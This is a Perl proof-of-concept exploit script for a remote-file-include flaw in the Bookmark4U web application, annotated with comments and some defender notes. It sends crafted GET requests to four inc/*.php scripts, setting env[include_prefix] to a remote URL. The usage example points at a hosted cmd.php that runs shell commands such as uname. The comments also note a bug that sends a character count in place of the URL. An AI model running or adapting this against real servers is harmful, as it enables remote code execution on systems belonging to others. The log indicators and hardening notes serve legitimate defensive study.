#!/usr/bin/perl
# Bookmark4U Multiple Remote File Include
#
# perl bm4u.pl
# Federico Fazzi
#
# Proof-of-concept request generator for a remote-file-include weakness in
# Bookmark4U: it sends one HTTP GET per entry in @includers, each targeting a
# script under inc/ with the env[include_prefix] query parameter set.
#
# Defender notes:
#   - Access-log entries for the four inc/*.php paths listed below that carry
#     an env[include_prefix] query parameter are the indicator to search for.
#   - NOTE(review): the PHP side is not shown on this page; presumably each
#     script builds an include path from env[include_prefix] -- confirm
#     against the application source. Usual hardening for this bug class is
#     to keep PHP's allow_url_include off and never derive include paths
#     from request data.
#   - The script runs without `use strict` / `use warnings`, and $socket is
#     never declared with `my`, so it is a package global.
use IO::Socket;

# Fewer than four command-line arguments: print the usage text. usage() calls
# exit(1), so execution does not continue past this line in that case.
if(@ARGV < 4) { &usage; }

my ($host, $port, $path, $cmd, $count);

# Request paths (relative to the Bookmark4U install path), each ending in the
# env[include_prefix]= parameter; the value is appended when the request line
# is built inside the loop below.
my @includers = ("inc/dbase.php?env[include_prefix]=",
                 "inc/config.php?env[include_prefix]=",
                 "inc/common.php?env[include_prefix]=",
                 "inc/function.php?env[include_prefix]=");

# hostname target (used for both the TCP connection and the Host: header)
$host = $ARGV[0];
# port of hostname target
$port = $ARGV[1];
# path of bookmark4u (prepended verbatim to each @includers entry)
$path = $ARGV[2];
# url of cracker_cmd
# As written, $cmd receives chomp's return value (the number of characters
# removed), not the text of the fourth argument; that count is what ends up
# after "env[include_prefix]=" in the request line.
$cmd = chomp($ARGV[3]);

# One connection and one request per includer path.
for($count = 0; $count <=$#includers; $count++) {

	# "http($port)" is IO::Socket::INET's service(port) form: the named
	# service, with the number in parentheses as the fallback if the service
	# name is unknown. Timeout is 2 seconds.
	$socket = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>"http($port)", Proto=>'tcp', Timeout=>'2');

	# A failed connect is skipped silently: no message is printed and the
	# loop moves on to the next path.
	if($socket) {
		print "\ntry $path$includers[$count] string!\n";
		# Request line is plain string concatenation; nothing is URL-encoded.
		print $socket "GET ".$path."$includers[$count]".$cmd." HTTP/1.1\r\n";
		print $socket "Host: ".$host."\r\n";
		# Connection: close is the last header; the blank line ends the request.
		print $socket "Connection: close\r\n\r\n";
		print "sending request string.. done!\n\n";
		# The scalar-context read in the condition consumes the first response
		# line (the HTTP status line) and discards it; the list-context read
		# then prints everything that remains.
		if(<$socket>) { print <$socket>; }
		close($socket);
	}
}

# Print the banner and an example invocation, then terminate with status 1.
sub usage {
	print "Bookmark4U Multiple Remote File Include\n";
	print "\$ perl bm4u.pl 192.168.0.1 80 /[bookmark4u_path/ http://example/cmd.php?&cmd=uname\n";
	print "Federico Fazzi \n\n";
	exit(1);
}